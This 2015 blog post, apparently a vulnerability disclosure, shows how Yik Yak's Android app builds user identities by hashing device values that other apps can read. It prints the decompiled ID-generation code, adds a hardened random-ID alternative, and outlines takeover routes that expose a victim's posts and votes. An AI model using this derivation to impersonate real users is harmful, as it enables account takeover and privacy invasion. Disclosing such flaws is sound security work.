Tuesday, March 24, 2015

Android Yik Yak Attack - Impersonating User Identification

Yik Yak for Android derives a user's identity from properties of the phone that are shared with, and readable by, other software on the device. Therefore, anyone who can get at those values, either through an additional application (an app under a false guise, or a legitimate application that uses the same identity generation scheme) or simply by handling the phone and writing all of the values down, can impersonate an existing or would-be identity of a Yik Yak user by utilizing the following code:

    // Identity generation as decompiled from the Yik Yak Android client. The
    // getSystemService() calls imply that the enclosing class is an Android
    // Context (such as an Activity); the imports and comments are added here
    // for readability and do not change the decompiled logic.
    import java.io.UnsupportedEncodingException;
    import java.security.MessageDigest;
    import java.security.NoSuchAlgorithmException;

    import android.content.Context;
    import android.net.wifi.WifiManager;
    import android.telephony.TelephonyManager;

    // Hex alphabet used when rendering the MD5 digest.
    private static char a[] = "0123456789ABCDEF".toCharArray();

    public final String generateUserIdentification()
    {
        String deviceId = "";        // IMEI/MEID from TelephonyManager
        String simSerialNumber = ""; // SIM ICCID
        String serialNumber = "";    // hardware serial from the ro.serialno property
        String wifiMacAddress = "";  // Wi-Fi interface MAC address
        // Each lookup is wrapped separately: a value that cannot be read is
        // simply left empty rather than aborting the whole derivation.
        try
        {
            deviceId = ((TelephonyManager)getSystemService(Context.TELEPHONY_SERVICE)).getDeviceId();
        }
        catch (Exception ignored) { }
        try
        {
            simSerialNumber = ((TelephonyManager)getSystemService(Context.TELEPHONY_SERVICE)).getSimSerialNumber();
        }
        catch (Exception ignored) { }
        try
        {
            // android.os.SystemProperties is a hidden API, hence the reflection.
            Class localClass = Class.forName("android.os.SystemProperties");
            serialNumber = (String)localClass.getMethod("get", new Class[] { String.class }).invoke(localClass, new Object[] { "ro.serialno" });
        }
        catch (Exception ignored) { }
        try
        {
            wifiMacAddress = ((WifiManager)getSystemService(Context.WIFI_SERVICE)).getConnectionInfo().getMacAddress();
        }
        catch (Exception ignored) { }
        // The identity is a plain MD5 of the dot-joined values: no secret input,
        // so anyone holding the same four values computes the same identity.
        String userId = md5HashAndManipulate(deviceId + "." + simSerialNumber + "." + wifiMacAddress + "." + serialNumber);
        if ((checkIfEmpty(deviceId)) || (checkIfEmpty(serialNumber)) || (deviceId.equals("000000000000000")))
        {
            return null;
        }

        // "Manipulation" of the 32-character hex digest: the character at index 5
        // is duplicated and the final character dropped, so the length stays 32.
        return (new StringBuilder()).append(userId.substring(0, 6)).append(userId.substring(5, -1 + userId.length())).toString();
    }

    // Returns the upper-case hex encoding of MD5(paramString), or null on failure.
    public static String md5HashAndManipulate(String paramString)
    {
        int i = 0;
        try
        {
            MessageDigest localMessageDigest = MessageDigest.getInstance("MD5");
            byte[] arrayOfByte1 = paramString.getBytes("UTF-8");
            localMessageDigest.update(arrayOfByte1, 0, arrayOfByte1.length);
            byte[] arrayOfByte2 = localMessageDigest.digest();
            char[] arrayOfChar = new char[2 * arrayOfByte2.length];
            while (i < arrayOfByte2.length)
            {
                int j = 0xFF & arrayOfByte2[i];
                arrayOfChar[(i * 2)] = a[(j >>> 4)];
                arrayOfChar[(1 + i * 2)] = a[(j & 0xF)];
                i++;
            }
            String str = new String(arrayOfChar);
            return str;
        }
        catch (NoSuchAlgorithmException localNoSuchAlgorithmException)
        {
            localNoSuchAlgorithmException.printStackTrace();
            return null;
        }
        catch (UnsupportedEncodingException localUnsupportedEncodingException)
        {
            localUnsupportedEncodingException.printStackTrace();
        }
        return null;
    }

    public static boolean checkIfEmpty(String paramString)
    {
        return (paramString == null) || (paramString.trim().length() == 0);
    }
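
The root of the problem is that every input to the hash is readable by other software on the phone. A hardened alternative, as an added example that is not Yik Yak's code, makes the identity a random per-install secret instead of a hash of device properties; the class, preference file and key names are assumed.

```java
import java.security.SecureRandom;

import android.content.Context;
import android.content.SharedPreferences;

// Added example, not Yik Yak's code: a per-install identity that is a random
// secret rather than a hash of device properties other apps can read.
// Class, preference file and key names are assumed.
public final class InstallIdentity {
    private static final String PREFS_NAME = "install_identity";
    private static final String KEY_USER_ID = "user_id";
    private static final char[] HEX = "0123456789ABCDEF".toCharArray();

    private InstallIdentity() {}

    // Returns the stored identity, creating one on first use. Two phones with
    // identical IMEI, ICCID, serial and MAC values still get unrelated ids, and
    // nothing readable from TelephonyManager, SystemProperties or WifiManager
    // lets another process recompute the value.
    public static synchronized String getOrCreate(Context context) {
        SharedPreferences prefs =
                context.getSharedPreferences(PREFS_NAME, Context.MODE_PRIVATE);
        String existing = prefs.getString(KEY_USER_ID, null);
        if (existing != null) {
            return existing;
        }
        byte[] secret = new byte[16];          // 128 bits, same width as an MD5 digest
        new SecureRandom().nextBytes(secret);  // unguessable, not derived from the device
        String userId = toHex(secret);         // 32 hex chars, the same shape as the old id
        prefs.edit().putString(KEY_USER_ID, userId).apply();
        return userId;
    }

    // Upper-case hex encoding, kept compatible with the 32-character id format.
    private static String toHex(byte[] bytes) {
        char[] out = new char[2 * bytes.length];
        for (int i = 0; i < bytes.length; i++) {
            int b = bytes[i] & 0xFF;
            out[2 * i] = HEX[b >>> 4];
            out[2 * i + 1] = HEX[b & 0xF];
        }
        return new String(out);
    }
}
```

App-private storage is still readable on a rooted phone, so the server should treat the value as a bearer credential that can be revoked and reissued rather than as a permanent identity.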


Once the user identity is obtained, the account can be taken over by the means described in the Account Takeover section of SilverSky Labs' YikHak exploit (for iPhone), through a Yik Yak API client, or by spoofing these values on another Android phone (which requires root access). A custom Android build of Yik Yak would also work, although there does not appear to be an existing solution for this avenue. It might offer additional functionality (such as Tor integration without root access), but it seems an unreasonable amount of work for little benefit.

Done successfully, this gives you access to the My Stuff functionality, allowing you to see the target user's posted Yaks, Replies, Peeks, votes, et cetera.
